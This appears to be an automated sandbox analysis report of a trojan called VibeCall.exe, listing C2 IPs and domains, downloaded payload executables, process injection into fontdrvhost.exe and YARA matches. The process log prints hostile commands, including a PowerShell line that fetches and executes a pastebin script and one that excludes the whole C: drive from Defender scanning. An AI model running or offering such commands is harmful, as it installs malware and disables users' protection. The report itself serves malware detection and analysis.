                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.60.20
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: unknownTCP traffic detected without corresponding DNS query: 171.22.120.233
                      Source: global trafficHTTP traffic detected: GET /raw/ySSytGm5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /downloads/aisolution_vibecall_a.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/contry_solution_vibecall_e.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET /downloads/soundsolution_vibecall_c.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET /downloads/videosolution_vibecall_b.exe HTTP/1.1Host: rustaisolutionnorisk.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: pastebin.com
                      Source: global trafficDNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: rustaisolutionnorisk.com
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: cloudflare-dns.com
                      Source: global trafficDNS traffic detected: DNS query: api.help-asus.com
                      Source: unknownDoH DNS queries detected: name: api.help-asus.com
                      Source: unknownHTTP traffic detected: POST /dns-query HTTP/1.1Host: cloudflare-dns.comAccept: application/dns-messageHost: cloudflare-dns.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Content-Length: 35Content-Type: application/dns-message
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.css
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://.jpg
                      Source: VibeCall.exe, 00000000.00000003.1754048266.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1754430639.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1754370535.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1754181293.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1753814276.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://html4/loose.dtd
                      Source: powershell.exe, 00000002.00000002.1940483304.00000210A13B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B65CD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016462436.0000020B74466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016462436.0000020B745A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000004.00000002.1932336792.0000020B659C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
                      Source: powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000002.00000002.1912849996.0000021091569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000002.00000002.1912849996.0000021091341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B643F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2145328385.000001A641DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.1912849996.0000021091569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: VibeCall.exe, 00000000.00000003.1768587243.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: VibeCall.exe, 00000000.00000003.1782887606.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ascendercorp.com/typedesigners.html
                      Source: VibeCall.exe, 00000000.00000003.1783882518.0000030A56D33000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1783695587.0000030A56D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                      Source: VibeCall.exe, 00000000.00000003.1783695587.0000030A56D31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm8=
                      Source: powershell.exe, 0000000C.00000002.2278452607.000001A65A612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                      Source: VibeCall.exe, 00000000.00000003.1751848067.0000030A56D45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                      Source: VibeCall.exe, 00000000.00000003.1767276726.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                      Source: VibeCall.exe, 00000000.00000003.1767230616.0000030A56D69000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1767155938.0000030A56D68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comR
                      Source: VibeCall.exe, 00000000.00000003.1767904702.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1767982858.0000030A56D47000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1767792346.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.comdd
                      Source: fontdrvhost.exeString found in binary or memory: https://171.22.120.233:4955/6519b3d55998bf5e49d571/9uhjmqat.jd8rm
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?Description:
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/downloadCommon
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/info
                      Source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-found
                      Source: powershell.exe, 00000002.00000002.1912849996.0000021091341000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B643F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2145328385.000001A641DB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: fontdrvhost.exeString found in binary or memory: https://api.help-asus.com:5101/6519b3d55998bf5e49d571/9uhjmqat.jd8rm
                      Source: powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: VibeCall.exe, 00000000.00000003.1752763950.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1752677795.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1752848956.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.mic
                      Source: VibeCall.exe, 00000000.00000003.1752763950.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1752677795.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmp, VibeCall.exe, 00000000.00000003.1752848956.0000030A56D3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.microso
                      Source: powershell.exe, 0000000C.00000002.2145328385.000001A641FD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000004.00000002.1932336792.0000020B65093000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000002.00000002.1940483304.00000210A13B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B65CD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016462436.0000020B74466000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2016462436.0000020B745A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2252645268.000001A651E24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000004.00000002.1932336792.0000020B65732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
                      Source: powershell.exe, 00000004.00000002.1928519656.0000020B62A10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932336792.0000020B65732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1932155541.0000020B62C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/ySSytGm5
                      Source: powershell.exe, 00000004.00000002.1932155541.0000020B62C45000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/yssytgm5
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 59621
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                      Source: unknownNetwork traffic detected: HTTP traffic on port 59621 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.16.248.249:443 -> 192.168.2.4:59621 version: TLS 1.2
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_1e00ee70-9
                      Source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_6b6b2405-e
                      Source: Yara matchFile source: 17.3.soundsolution_vibecall_c.exe.4df0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.3.soundsolution_vibecall_c.exe.5010000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.3.contry_solution_vibecall_e.exe.36b0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.fontdrvhost.exe.5690000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.3.OpenWith.exe.5010000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.aisolution_vibecall_a.exe.39d0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.3.soundsolution_vibecall_c.exe.4df0000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.3.soundsolution_vibecall_c.exe.5010000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 44.3.OpenWith.exe.4df0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.fontdrvhost.exe.5690000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.fontdrvhost.exe.5550000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.3.aisolution_vibecall_a.exe.37b0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.3.soundsolution_vibecall_c.exe.4df0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.3.contry_solution_vibecall_e.exe.3490000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.fontdrvhost.exe.5470000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.fontdrvhost.exe.5770000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.fontdrvhost.exe.5470000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.fontdrvhost.exe.5470000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.fontdrvhost.exe.5550000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.3.contry_solution_vibecall_e.exe.36b0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.3.soundsolution_vibecall_c.exe.4df0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.3.fontdrvhost.exe.5550000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000011.00000003.2761352961.0000000005010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2635389333.0000000005550000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.2673636720.0000000005470000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.2674081436.0000000005690000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.2760852236.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2663175425.00000000036B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.2769896802.0000000005010000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000003.2769207623.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.2635666692.0000000005770000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000003.2662989095.0000000003490000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: aisolution_vibecall_a.exe PID: 5936, type: MEMORYSTR
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_00000228E99215C0 NtAcceptConnectPort,37_2_00000228E99215C0
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_00000228E9921CF4 NtAcceptConnectPort,CloseHandle,37_2_00000228E9921CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_00000228E9921AA4 NtAcceptConnectPort,NtAcceptConnectPort,37_2_00000228E9921AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_00000228E9920AC8 NtAcceptConnectPort,NtAcceptConnectPort,37_2_00000228E9920AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 43_2_000001C328260AC8 NtAcceptConnectPort,NtAcceptConnectPort,43_2_000001C328260AC8
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 43_2_000001C328261AA4 NtAcceptConnectPort,NtAcceptConnectPort,43_2_000001C328261AA4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 43_2_000001C328261CF4 NtAcceptConnectPort,CloseHandle,43_2_000001C328261CF4
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 43_2_000001C3282615C0 NtAcceptConnectPort,43_2_000001C3282615C0
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0143117015_3_01431170
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0142F13B15_3_0142F13B
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0143CC2515_3_0143CC25
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0142C09A15_3_0142C09A
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0142C3DC15_3_0142C3DC
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_01436F8915_3_01436F89
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: 15_3_0143264D15_3_0143264D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_0063CC2516_3_0063CC25
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_0062C09A16_3_0062C09A
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_0063117016_3_00631170
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_0062F13B16_3_0062F13B
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_0063264D16_3_0063264D
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_0062C3DC16_3_0062C3DC
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: 16_3_00636F8916_3_00636F89
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeCode function: 17_3_01780BC117_3_01780BC1
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 37_2_00000228E9920C7037_2_00000228E9920C70
                      Source: C:\Windows\System32\fontdrvhost.exeCode function: 43_2_000001C328260C7043_2_000001C328260C70
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeCode function: String function: 00627FB0 appears 38 times
                      Source: C:\Users\user\aisolution_vibecall_a.exeCode function: String function: 01427FB0 appears 38 times
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 624
                      Source: VibeCall.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                      Source: videosolution_vibecall_b.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: videosolution_vibecall_b.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: aisolution_vibecall_a.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: aisolution_vibecall_a.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: contry_solution_vibecall_e.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: EXE type: PE32 executable (GUI) Intel 80386, for MS Windows
                      Source: soundsolution_vibecall_c.exe.0.drStatic PE information: Resource name: ZIP type: 7-zip archive data, version 0.4
                      Source: VibeCall.exe, 00000000.00000000.1745566151.00007FF68A1F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs VibeCall.exe
                      Source: VibeCall.exe, 00000000.00000000.1745566151.00007FF68A1F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameVibeCall.dll2 vs VibeCall.exe
                      Source: classification engineClassification label: mal84.troj.evad.winEXE@36/25@7/9
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\aisolution_vibecall_a.exeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-372783b-5f8a-e1640a-0a199f94217d}
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4e5bfc57-9dd8-f68e5-2d765d85c0d6}
                      Source: C:\Windows\SysWOW64\OpenWith.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4fb3f26-9d18-66b568-627b8a85e4b6}
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2892
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8116
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                      Source: C:\Users\user\Desktop\VibeCall.exeFile created: C:\Users\user\AppData\Local\Temp\ynnjwwvy.hvhJump to behavior
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\VibeCall.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\VibeCall.exe "C:\Users\user\Desktop\VibeCall.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\aisolution_vibecall_a.exe "C:\Users\user\aisolution_vibecall_a.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exeProcess created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 624
                      Source: C:\Users\user\aisolution_vibecall_a.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 652
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 652
